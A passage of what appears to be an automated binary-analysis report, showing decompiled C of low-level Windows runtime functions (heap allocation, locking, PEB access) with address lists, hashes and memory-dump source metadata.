                                                                                                                                0x04eeaa3c
                                                                                                                                0x04f44458
                                                                                                                                0x04f44458
                                                                                                                                0x04f44472
                                                                                                                                0x04f44474
                                                                                                                                0x04f44476
                                                                                                                                0x04eeaa64
                                                                                                                                0x04eeaa74
                                                                                                                                0x04f4447c
                                                                                                                                0x04f44483
                                                                                                                                0x04f44492
                                                                                                                                0x04eeaa52
                                                                                                                                0x04eeaa54
                                                                                                                                0x04eeaa5e
                                                                                                                                0x04f444a8
                                                                                                                                0x04f444ad
                                                                                                                                0x04f444af
                                                                                                                                0x04f444b6
                                                                                                                                0x04f444b6
                                                                                                                                0x04f444b9
                                                                                                                                0x04f444bc
                                                                                                                                0x04f444cd
                                                                                                                                0x04f444d3
                                                                                                                                0x04f444d6
                                                                                                                                0x04f444e1
                                                                                                                                0x04f444e1
                                                                                                                                0x04f444e6
                                                                                                                                0x04f444e8
                                                                                                                                0x04f444fb
                                                                                                                                0x04f444fb
                                                                                                                                0x04f444e8
                                                                                                                                0x00000000
                                                                                                                                0x04eeaa5e
                                                                                                                                0x04f44476
                                                                                                                                0x04eeaa42
                                                                                                                                0x04eeaa46
                                                                                                                                0x04eeaa48
                                                                                                                                0x04eeaa4c
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4fbddd028e9b31d717c71744314f8897a83a7249bb5b2eb908fc7983766491e4
                                                                                                                                • Instruction ID: e60b2bd841a06245e1f7a4b3f036cc2d0dc38f2fc98215b403cce97ec9d68e69
                                                                                                                                • Opcode Fuzzy Hash: 4fbddd028e9b31d717c71744314f8897a83a7249bb5b2eb908fc7983766491e4
                                                                                                                                • Instruction Fuzzy Hash: 0831E371A00619ABDB14AF65CE81ABFB7B9EF44704F00446DF905E7150EB34BD12DBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F28EC7, Relevance: .1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 93%
                                                                                                                                			E04F28EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4fdd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04F14E70(0x4fd86e4, 0x4f29490, 0, 0);
					if( *0x4fd53e8 > 5 && E04F28F33(0x4fd53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4fd53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4fd53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4ecbc46;
						_t48 = E04F67B9C(0x4fd53e8, 0x4ecbc46, _t67, 0x4fd53e8, _t70,  &_v140);
					}
				}
				return E04F2B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                                                0x04f28ec7
                                                                                                                                0x04f28ed9
                                                                                                                                0x04f28edc
                                                                                                                                0x04f28ee6
                                                                                                                                0x04f28ee9
                                                                                                                                0x04f28eee
                                                                                                                                0x04f28efc
                                                                                                                                0x04f28f08
                                                                                                                                0x04f61349
                                                                                                                                0x04f61353
                                                                                                                                0x04f6135d
                                                                                                                                0x04f61366
                                                                                                                                0x04f6136f
                                                                                                                                0x04f61375
                                                                                                                                0x04f6137c
                                                                                                                                0x04f61385
                                                                                                                                0x04f61390
                                                                                                                                0x04f61391
                                                                                                                                0x04f6139c
                                                                                                                                0x04f6139d
                                                                                                                                0x04f613a6
                                                                                                                                0x04f613ac
                                                                                                                                0x04f613b2
                                                                                                                                0x04f613b5
                                                                                                                                0x04f613bc
                                                                                                                                0x04f613bf
                                                                                                                                0x04f613c2
                                                                                                                                0x04f613c5
                                                                                                                                0x04f613c8
                                                                                                                                0x04f613cb
                                                                                                                                0x04f613ce
                                                                                                                                0x04f613d1
                                                                                                                                0x04f613d4
                                                                                                                                0x04f613d7
                                                                                                                                0x04f613da
                                                                                                                                0x04f613dd
                                                                                                                                0x04f613e0
                                                                                                                                0x04f613e3
                                                                                                                                0x04f613e6
                                                                                                                                0x04f613e9
                                                                                                                                0x04f613f6
                                                                                                                                0x04f61400
                                                                                                                                0x04f61400
                                                                                                                                0x04f28f08
                                                                                                                                0x04f28f32

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 80121839d3ad4a89fc93938bdad62d4b2efe0e45b813487b754db98fbbf1e449
                                                                                                                                • Instruction ID: 024ae759a41beefca9e172403abbb6945cddd4a569d1a4007eaa542df0a94e46
                                                                                                                                • Opcode Fuzzy Hash: 80121839d3ad4a89fc93938bdad62d4b2efe0e45b813487b754db98fbbf1e449
                                                                                                                                • Instruction Fuzzy Hash: 8241A1B1D002289FDB20DFAAD981AADFBF5FB48314F5041AEE519A7200E774AA45CF50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F24A2C, Relevance: .1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 58%
                                                                                                                                			E04F24A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4fdd360 ^ _t62;
				_v8 =  *0x4fdd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04F02280(_t26, 0x4fd8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04EFFFB0(_t41, _t51, 0x4fd8608);
						L2:
						 *0x4fdb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04F2B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04F02280(_t28, 0x4fd8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04EFFFB0(_t42, _t53, 0x4fd8608);
							if(_t53 != 0) {
								L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04EFFFB0(_t41, _t51, 0x4fd8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                                                0x04f24a2c
                                                                                                                                0x04f24a34
                                                                                                                                0x04f24a3c
                                                                                                                                0x04f24a3e
                                                                                                                                0x04f24a48
                                                                                                                                0x04f24a4b
                                                                                                                                0x04f24a4d
                                                                                                                                0x04f24a51
                                                                                                                                0x04f24a9c
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f24aa3
                                                                                                                                0x04f24aa8
                                                                                                                                0x04f24aad
                                                                                                                                0x04f24ab1
                                                                                                                                0x04f24ade
                                                                                                                                0x04f24ae3
                                                                                                                                0x04f24a5a
                                                                                                                                0x04f24a62
                                                                                                                                0x04f24a6a
                                                                                                                                0x04f24a6e
                                                                                                                                0x04f5f203
                                                                                                                                0x04f24a84
                                                                                                                                0x04f24a88
                                                                                                                                0x04f24a89
                                                                                                                                0x04f24a8a
                                                                                                                                0x04f24a95
                                                                                                                                0x04f24a95
                                                                                                                                0x04f24a79
                                                                                                                                0x04f24a80
                                                                                                                                0x04f24af2
                                                                                                                                0x04f24af4
                                                                                                                                0x04f24af9
                                                                                                                                0x04f24aff
                                                                                                                                0x04f24b01
                                                                                                                                0x04f24b03
                                                                                                                                0x04f24b08
                                                                                                                                0x04f5f20a
                                                                                                                                0x04f5f212
                                                                                                                                0x04f5f216
                                                                                                                                0x04f5f216
                                                                                                                                0x04f24b08
                                                                                                                                0x04f24b13
                                                                                                                                0x04f24b1a
                                                                                                                                0x04f5f229
                                                                                                                                0x04f5f229
                                                                                                                                0x04f24b1a
                                                                                                                                0x04f24a82
                                                                                                                                0x00000000
                                                                                                                                0x04f24a82
                                                                                                                                0x04f24ab7
                                                                                                                                0x04f24acd
                                                                                                                                0x04f24acd
                                                                                                                                0x04f24ad5
                                                                                                                                0x04f24ada
                                                                                                                                0x00000000
                                                                                                                                0x04f24ada
                                                                                                                                0x04f24ac2
                                                                                                                                0x04f24acb
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f24acb
                                                                                                                                0x04f24a53
                                                                                                                                0x04f24a53
                                                                                                                                0x04f24a58
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee0a0ab774aaa69fdf8209a2e143471fdcc660121d7bec626ce556a7b63fce34
                                                                                                                                • Instruction ID: c3059a677da1e3edf8c71c24356e8df877f0727993410fa44a9f27441d6c1234
                                                                                                                                • Opcode Fuzzy Hash: ee0a0ab774aaa69fdf8209a2e143471fdcc660121d7bec626ce556a7b63fce34
                                                                                                                                • Instruction Fuzzy Hash: B1310232A02260EBD721EF54CE44B2ABBA5FFC1714F054869E9664B240D7B0FC06DF96
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1E730, Relevance: .1, Instructions: 89COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 74%
                                                                                                                                			E04F1E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04F29670() < 0) {
					L04F3DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4fd7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L04F04620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M04F1E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                                                0x04f1e730
                                                                                                                                0x04f1e736
                                                                                                                                0x04f1e738
                                                                                                                                0x04f1e73d
                                                                                                                                0x04f1e73e
                                                                                                                                0x04f1e740
                                                                                                                                0x04f1e749
                                                                                                                                0x04f1e765
                                                                                                                                0x04f1e76a
                                                                                                                                0x04f1e76b
                                                                                                                                0x04f1e76c
                                                                                                                                0x04f1e76d
                                                                                                                                0x04f1e76e
                                                                                                                                0x04f1e76f
                                                                                                                                0x04f1e775
                                                                                                                                0x04f1e777
                                                                                                                                0x04f1e77e
                                                                                                                                0x04f5b675
                                                                                                                                0x04f1e784
                                                                                                                                0x04f1e784
                                                                                                                                0x04f1e789
                                                                                                                                0x04f1e7a8
                                                                                                                                0x04f1e7ac
                                                                                                                                0x04f1e807
                                                                                                                                0x04f1e7ae
                                                                                                                                0x04f1e7ae
                                                                                                                                0x04f1e7b1
                                                                                                                                0x04f1e7b4
                                                                                                                                0x04f1e7b9
                                                                                                                                0x04f1e7c0
                                                                                                                                0x04f1e7c4
                                                                                                                                0x04f1e7ca
                                                                                                                                0x04f1e7cc
                                                                                                                                0x00000000
                                                                                                                                0x04f1e7d3
                                                                                                                                0x04f1e7d6
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1e7ff
                                                                                                                                0x04f1e802
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1e7f9
                                                                                                                                0x04f1e7fc
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1e7f3
                                                                                                                                0x04f1e7f6
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1e7ed
                                                                                                                                0x04f1e7f0
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1e7e7
                                                                                                                                0x04f1e7ea
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5b685
                                                                                                                                0x04f5b688
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5b682
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1e7cc
                                                                                                                                0x04f1e7d9
                                                                                                                                0x04f1e7dc
                                                                                                                                0x04f1e7de
                                                                                                                                0x04f1e7de
                                                                                                                                0x04f1e7ac
                                                                                                                                0x04f1e7e4
                                                                                                                                0x04f1e74b
                                                                                                                                0x04f1e751
                                                                                                                                0x04f1e759
                                                                                                                                0x04f1e761
                                                                                                                                0x04f1e761

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 034ba3daa7f0c462769728ee3dc57a337676599dab3b9a0958a2bd855eb189ca
                                                                                                                                • Instruction ID: d756f46529c6c5fb4a5ef33700dbcab7bfba48a0960522823b15ba8b1b0bdbb6
                                                                                                                                • Opcode Fuzzy Hash: 034ba3daa7f0c462769728ee3dc57a337676599dab3b9a0958a2bd855eb189ca
                                                                                                                                • Instruction Fuzzy Hash: B8318C75A14249AFE704CF28D840B9ABBE4FB08314F148256FD14CB351E635ED81CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1BC2C, Relevance: .1, Instructions: 88COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 67%
                                                                                                                                			E04F1BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4fd6100; // 0x4c
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E04F02280(0xd, 0x18f2f1a0);
				_t41 =  *0x4fd60f8; // 0x0
				if(_t41 != 0) {
					 *0x4fd60f8 =  *_t41;
					 *0x4fd60fc =  *0x4fd60fc + 0xffff;
				}
				E04EFFFB0(_t41, 0x800, 0x18f2f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x4fd60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L04F04620(0x4fd6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4fd6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                                                                0x04f1bc36
                                                                                                                                0x04f1bc42
                                                                                                                                0x04f1bc45
                                                                                                                                0x04f1bc4a
                                                                                                                                0x04f1bd35
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1bc50
                                                                                                                                0x04f1bc50
                                                                                                                                0x04f1bc58
                                                                                                                                0x04f1bc5a
                                                                                                                                0x04f1bc60
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5a4f2
                                                                                                                                0x04f5a4f6
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f5a4fc
                                                                                                                                0x04f1bc79
                                                                                                                                0x04f1bc7e
                                                                                                                                0x04f1bc86
                                                                                                                                0x04f1bd16
                                                                                                                                0x04f1bd20
                                                                                                                                0x04f1bd20
                                                                                                                                0x04f1bc8d
                                                                                                                                0x04f1bc94
                                                                                                                                0x04f1bcbd
                                                                                                                                0x04f1bcca
                                                                                                                                0x04f1bccb
                                                                                                                                0x04f1bccc
                                                                                                                                0x04f1bccd
                                                                                                                                0x04f1bcce
                                                                                                                                0x04f1bcd4
                                                                                                                                0x04f1bcea
                                                                                                                                0x04f1bcee
                                                                                                                                0x04f1bcf2
                                                                                                                                0x04f1bd00
                                                                                                                                0x04f1bd04
                                                                                                                                0x00000000
                                                                                                                                0x04f1bc96
                                                                                                                                0x04f1bcab
                                                                                                                                0x04f1bcaf
                                                                                                                                0x04f1bd2c
                                                                                                                                0x04f1bd2c
                                                                                                                                0x04f1bd09
                                                                                                                                0x00000000
                                                                                                                                0x04f1bd09
                                                                                                                                0x04f1bcb1
                                                                                                                                0x04f1bcb5
                                                                                                                                0x04f1bcbb
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f1bcbb

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 90a87118790462c7786aadc2acf358a1ab6040d61274958942328c964b34262f
                                                                                                                                • Instruction ID: fb3fe83e8a1a560eebf9485120a5d5fce381ba18e22f0678cc34dacff799c7a2
                                                                                                                                • Opcode Fuzzy Hash: 90a87118790462c7786aadc2acf358a1ab6040d61274958942328c964b34262f
                                                                                                                                • Instruction Fuzzy Hash: 01310E32A0165ADBEB01DFA8E8807A673A5EB08310F044179ED04EB211EB38FD068B80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F11DB5, Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 60%
                                                                                                                                			E04F11DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E04F0F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04F04620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E04F0F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                                                                0x04f11dc2
                                                                                                                                0x04f11dc5
                                                                                                                                0x04f11dc7
                                                                                                                                0x04f11dcc
                                                                                                                                0x04f11dce
                                                                                                                                0x04f11dd6
                                                                                                                                0x04f11ddf
                                                                                                                                0x04f11de0
                                                                                                                                0x04f11de1
                                                                                                                                0x04f11de5
                                                                                                                                0x04f11de8
                                                                                                                                0x04f11def
                                                                                                                                0x04f11df0
                                                                                                                                0x04f11df6
                                                                                                                                0x04f11df7
                                                                                                                                0x04f11dfe
                                                                                                                                0x04f11e1a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f11e0b
                                                                                                                                0x04f11e12
                                                                                                                                0x04f11e12
                                                                                                                                0x04f11e00
                                                                                                                                0x04f11e00
                                                                                                                                0x04f11e05
                                                                                                                                0x04f11e1e
                                                                                                                                0x04f11e23
                                                                                                                                0x04f5570f
                                                                                                                                0x04f55713
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f55719
                                                                                                                                0x04f55719
                                                                                                                                0x04f11e2c
                                                                                                                                0x04f11e2d
                                                                                                                                0x04f11e2e
                                                                                                                                0x04f11e2f
                                                                                                                                0x04f11e31
                                                                                                                                0x04f11e32
                                                                                                                                0x04f11e35
                                                                                                                                0x04f11e3d
                                                                                                                                0x04f55723
                                                                                                                                0x04f5573d
                                                                                                                                0x04f5573d
                                                                                                                                0x00000000
                                                                                                                                0x04f55723
                                                                                                                                0x04f11e49
                                                                                                                                0x04f11e4e
                                                                                                                                0x04f11e4e
                                                                                                                                0x04f11e09
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                • Instruction ID: 2908bc3588d548b3edc092d1f5725f0d355751e75cd94099686bcb09701f7851
                                                                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                                                                • Instruction Fuzzy Hash: 65219132B00118FFD720CF99CD80E6BBBB9EF89784F114055EA0197260DA31BD02D7A0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE9100, Relevance: .1, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 76%
                                                                                                                                			E04EE9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x4fbf6e8);
				E04F3D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
